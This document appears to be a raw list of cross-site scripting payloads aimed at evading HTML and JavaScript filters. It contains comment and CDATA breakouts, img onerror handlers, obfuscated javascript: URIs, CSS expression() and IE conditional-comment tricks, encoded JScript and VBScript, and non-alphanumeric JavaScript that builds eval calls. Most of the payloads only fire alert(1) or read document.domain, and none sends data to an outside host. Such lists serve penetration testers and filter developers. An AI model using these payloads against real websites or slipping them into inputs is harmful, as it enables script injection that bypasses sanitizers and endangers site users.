![CDATA[><img src="x" onerror="alert(1)">]]>
!--><img src="x" onerror="alert(1)">-->
!----><img src="x" onerror="alert(1)">--&gt;
1;><x:!µ!:x\/style='b&#x5c;65h\0061vio\r:url(#def&#x61ult#time2)'/onbegin=\u00&#54;1lert&#40&#x31)&#x2f/&xyz\>
<L:µ onclick=alert(1)>click me</L:µ>
."><img/ \/\µ src=x onerror=alert(1)//>
"><img/ \/\µ/src=x onerror=alert(1)//>
"><img/\/\µ/src=x onerror=alert(1)//>
"><img/ \/\µ/""src=x onerror=alert(1)//>
"><img/\/\µ/""src=x onerror=alert(1)//>
<img/x="/\'"'src='x'"'/\"onerror=alert(1)//\
/\%20src=%17y%17''onerror=%C2%A0alert(1)//
" type=image src=1 onerror=alert(1)//"
<a:b:c xmlns:a xmlns:b onmouseover=alert(1)>XXX</a:b:c>
'-= \a expr\65 ss/*\&#x2a/ion(write(1))'
javascript:'\x3cimg src\x3dx onerror=alert(document.domain)>'
):<!--[if IE 8]><p>Welcome to Internet Explorer 8.</p><![endif]-->
:@media tty { i{content:"\";/*" "*/}}@m; @import 'styles.css'; /*";} }/* */
<!--[if<img src=x onerror=alert(1)//]-->
<!--[if true]><script>alert('IE');document.write("<![endif]"+"--><!--");
"java'.$chr.'script:alert('.$i.')"
" j&#x61vasc ri&#10pt: //%0&#x61 &#x00025;61lert(1)"
"al&#000101rt&#8233 //*&#00*/(document. dom&#x5cu0061in)//"
.docum%65nt.dom\x&#x0032;561&#x92in
try {eval('&#92x252525252525252525255Cu0061lert(1)')}
display:block;position:absolute;top:0;left:0;width:999em;height:999em onmouseover=alert(1) a="
<![CDATA[alert(document.domain)]]>
http://&quot;);xss/**/&#x3a;&#65279expression(alert(1));+&quot;
J&#97vAscript:'+&#x28[&#x5d+'document.write\r\(/*&#x2a/1)
<!---/**/&#61expression(write(1))/*-->
&lt;img/src=&quot;x&quot;onerror=alert(document.domain)&gt;
<!ENTITY x "&#x61;l&#x26;y;"><!ENTITY y "ert">
[<!ENTITY x "&#x61;l&#x26;y;"><!ENTITY y "ert">]
'\u0061\u006c\u0065\u0072\u0074(1)'.replace(/\u0061\u006c\u0065\u0072\u0074.+/,\u0065\u0076\u0061\u006c);
\u0052\u0065\u0067\u0045\u0078\u0070('\u005c\u0075\u0030\u0030\u0036\u0031\u005c\u0075\u0030\u0030\u0036\u0063\u005c\u0075\u0030\u0030\u0036\u0035\u005c\u0075\u0030\u0030\u0037\u0032\u005c\u0075\u0030\u0030\u0037\u0034\u0028\u0031\u0029')['\u0073\u006f\u0075\u0072\u0063\u0065'].\u0072\u0065\u0070\u006c\u0061\u0063\u0065(\u0052\u0065\u0067\u0045\u0078\u0070('\u005c\u0075\u0030\u0030\u0035\u0063\u005c\u0075\u0030\u0030\u0037\u0035\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0036\u005c\u0075\u0030\u0030\u0033\u0031\u005c\u0075\u0030\u0030\u0035\u0063\u005c\u0075\u0030\u0030\u0037\u0035\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0036\u005c\u0075\u0030\u0030\u0036\u0033\u005c\u0075\u0030\u0030\u0035\u0063\u005c\u0075\u0030\u0030\u0037\u0035\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0036\u005c\u0075\u0030\u0030\u0033\u0035\u005c\u0075\u0030\u0030\u0035\u0063\u005c\u0075\u0030\u0030\u0037\u0035\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0037\u005c\u0075\u0030\u0030\u0033\u0032\u005c\u0075\u0030\u0030\u0035\u0063\u005c\u0075\u0030\u0030\u0037\u0035\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0037\u005c\u0075\u0030\u0030\u0033\u0034\u005c\u0075\u0030\u0030\u0032\u0038\u005c\u0075\u0030\u0030\u0033\u0031\u005c\u0075\u0030\u0030\u0032\u0039'),\u0065\u0076\u0061\u006c);
eval(RegExp('\x5c\x75\x30\x30\x36\x31').source+String.fromCharCode(0154)+'\\u00'+0x41+/\u0072/('\x72')+'\134u0074'+'(1)')
vbsc&#114;&#105;&#112;&#116;&#46;&#101;&#110;&#99;&#111;&#100;&#101;&#58;&#35;&#64;&#126;&#94;&#67;&#65;&#65;&#65;&#65;&#65;&#61;&#61;&#92;ko$K6,FoQIAAA==ˆ#~@
vbs:execScript ch&#114;(35)&"@~ˆCAAAAA==\ko$K6"&chr(44)&"FoQIAAA==ˆ#~@","vbscri&#x70;&#x74;&#x2e;encode"
# language="JScript.Encode" onclick="#@~ˆCAAAAA==Cˆ+.D`8#mgIAAA==ˆ#~@">test</a><iframe onload=JScript.Encode:#@~ˆCAAAAA==Cˆ+.D`8#mgIAAA==ˆ#~@
_=[]|[];$=_++;__=(_<<_);___=(_<<_)+_;____=__+__;_____=__+___;$=({}+"")[_____]+({}+"")[_]+({}[$]+"")[_]+(($!=$)+"")[___]+(($==$)+"")[$]+(($==$)+"")[_]+(($==$)+"")[__]+({}+"")[_____]+(($==$)+"")[$]+({}+"")[_]+(($==$)+"")[_];$$=(($!=$)+"")[_]+(($!=$)+"")[__]+(($==$)+"")[___]+(($==$)+"")[_]+(($==$)+"")[$];$_$=({}+"")[_____]+({}+"")[_]+({}+"")[_]+(($!=$)+"")[__]+({}+"")[__+_____]+({}+"")[_____]+({}+"")[_]+({}[$]+"")[__]+(($==$)+"")[___]; ($)[$][$]($"('"+$_"')")()
alert((+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]])
Á[(Á+[])[Å]+µ+(Á+[])[Ä]+a+À+o+(Á+[])[Ã]+(Á+[])[Å]+À+µ+o]("alert(1)")()
[___=[[_=[]]==_]+_[__=/_/+_]][_____=[_____=__[++_]+__[_]]+[/_/[_______=[______=[____=[__=[_==_]+_[_]][___[+[]]+___[_+[+[]]]+___[++_]+__[+[]]+__[++_]+__[_/_]]+_][+[]][_]]+[____=____[_+_]]+___[_+_]+___[_]+__[+[]]+__[_/_]+__[++_]+______+__[+[]]+____+__[_/_]]+_][+[]][_/_+[_]]+___[_=_/_]+__[_++]+__[++_]+___[_+_]+__[_=+[]]+_____][___[++_+_]+____+______+___[_]+__[+[]]+___[_+[+[]]]+____+ ___[++_+_+_]]=[__=_[_______]+_][_____][__[_]+___[_/_]+__[_/_+[_/_]]+___[_+_]]
